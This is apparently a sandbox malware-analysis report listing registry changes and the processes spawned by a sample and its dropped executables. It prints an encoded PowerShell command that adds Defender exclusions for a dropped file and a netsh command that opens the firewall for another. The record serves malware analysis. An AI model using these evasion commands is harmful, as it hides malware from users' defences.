| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkU4NUMwNzItNTQ0MS00OTVDLUIxNkEtNjkyM0UwMTdFN0E5fSIgdXNlcmlkPSJ7RTM3RTI5MTItRjY3MC00MDI5LUI2QjMtRDcwRUFBREYxOTAyfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7MjQwMUEzQzktQTAwMS00Mzg3LUI4MDgtRDY1NTM4RjNENjY1fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjMiIGluc3RhbGxkYXRldGltZT0iMTczOTE4NDcxMiIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNjU1NjY2MDQzMDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUwMTUxMzcwNDMiLz48L2FwcD48L3JlcXVlc3Q-
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEYAaQBsAGUAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe
"C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe"
C:\Users\Admin\AppData\Local\Temp\Files\Update.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Update.exe"
C:\Users\Admin\AppData\Roaming\Update.exe
"C:\Users\Admin\AppData\Roaming\Update.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Update.exe" "Update.exe" ENABLE
C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe
"C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe"
C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe
"C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe"
C:\Users\Admin\AppData\Local\Temp\Files\heo.exe
"C:\Users\Admin\AppData\Local\Temp\Files\heo.exe"
C:\Users\Admin\AppData\Local\Temp\Files\heo.exe
"C:\Users\Admin\AppData\Local\Temp\Files\heo.exe"
C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe
"C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\MicrosoftEdge_X64_133.0.3065.59.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff772eb6a68,0x7ff772eb6a74,0x7ff772eb6a80
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff772eb6a68,0x7ff772eb6a74,0x7ff772eb6a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6fc4e6a68,0x7ff6fc4e6a74,0x7ff6fc4e6a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6fc4e6a68,0x7ff6fc4e6a74,0x7ff6fc4e6a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6fc4e6a68,0x7ff6fc4e6a74,0x7ff6fc4e6a80
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --previous-version="132.0.2957.140" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff63a5b6a68,0x7ff63a5b6a74,0x7ff63a5b6a80
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkU4NUMwNzItNTQ0MS00OTVDLUIxNkEtNjkyM0UwMTdFN0E5fSIgdXNlcmlkPSJ7RTM3RTI5MTItRjY3MC00MDI5LUI2QjMtRDcwRUFBREYxOTAyfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins2MTNBOTc5Ni1EOUFBLTQ3NTctOUJGOC1BQThBMDZFNzYwODd9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMyIgY29ob3J0PSJycmZAMC42MiI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSI0IiByZD0iNjYxNSIgcGluZ19mcmVzaG5lc3M9Ins2MzhDQzQ5Ni1DNDc0LTRGQjktOUI3NC05QTBGMTExNTlFOTJ9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjkwLjAuODE4LjY2IiBuZXh0dmVyc2lvbj0iMTMzLjAuMzA2NS41OSIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSIzIiBpc19waW5uZWRfc3lzdGVtPSJ0cnVlIiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzODM2NjAyNTM1ODYxMDAwIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjEyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MTAyMzI0ODg0IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUxMDI0ODA1OTciIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDcwMjM4MzgiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEzODQyODI3MDEyIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJkbyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvZmVkNTU4MDUtMmU4NS00MWQ4LWI0ZTMtNGVmNmI1ZWJmNjNhP1AxPTE3NDAxMDExMTcmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9UEc4WThna3BmcndMZ3dQTUZPMEZRTEY1aEhLa1VvS2lYaDgydXFTUHFFSUVwVGpxd1J2Yzk1YWYxTmV1T2cxVkF2TyUyYnZxdmVMeG8ySThJeFVBdWF0dyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDEyODk0IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMzg0MjgyNzAxMiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvZmVkNTU4MDUtMmU4NS00MWQ4LWI0ZTMtNGVmNmI1ZWJmNjNhP1AxPTE3NDAxMDExMTcmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9UEc4WThna3BmcndMZ3dQTUZPMEZRTEY1aEhLa1VvS2lYaDgydXFTUHFFSUVwVGpxd1J2Yzk1YWYxTmV1T2cxVkF2TyUyYnZxdmVMeG8ySThJeFVBdWF0dyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjEwNTIzNDk0NyIgdG90YWw9IjE3ODYwNDA4OCIgZG93bmxvYWRfdGltZV9tcz0iNDE1ODcxIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDEyODk0IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMzg0MjgyNzAxMiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0id2luaHR0cCIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvZmVkNTU4MDUtMmU4NS00MWQ4LWI0ZTMtNGVmNmI1ZWJmNjNhP1AxPTE3NDAxMDExMTcmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9UEc4WThna3BmcndMZ3dQTUZPMEZRTEY1aEhLa1VvS2lYaDgydXFTUHFFSUVwVGpxd1J2Yzk1YWYxTmV1T2cxVkF2TyUyYnZxdmVMeG8ySThJeFVBdWF0dyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IjE5OS4yMzIuMjEwLjE3MiIgY2RuX2NpZD0iMyIgY2RuX2NjYz0iR0IiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IkhJVCIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIyMjg5MTQyNCIgdG90YWw9IjE3ODYwNDA4OCIgZG93bmxvYWRfdGltZV9tcz0iMzQ0MDA2Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDIzODM4IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMzg0MjgyNzAxMiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2ZlZDU1ODA1LTJlODUtNDFkOC1iNGUzLTRlZjZiNWViZjYzYT9QMT0xNzQwMTAxMTE3JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PVBHOFk4Z2twZnJ3TGd3UE1GTzBGUUxGNWhIS2tVb0tpWGg4MnVxU1BxRUlFcFRqcXdSdmM5NWFmMU5ldU9nMVZBdk8lMmJ2cXZlTHhvMkk4SXhVQXVhdHclM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIwIiB0b3RhbD0iMCIgZG93bmxvYWRfdGltZV9tcz0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMzg0MjgyNzAxMiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvZmVkNTU4MDUtMmU4NS00MWQ4LWI0ZTMtNGVmNmI1ZWJmNjNhP1AxPTE3NDAxMDExMTcmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9UEc4WThna3BmcndMZ3dQTUZPMEZRTEY1aEhLa1VvS2lYaDgydXFTUHFFSUVwVGpxd1J2Yzk1YWYxTmV1T2cxVkF2TyUyYnZxdmVMeG8ySThJeFVBdWF0dyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3J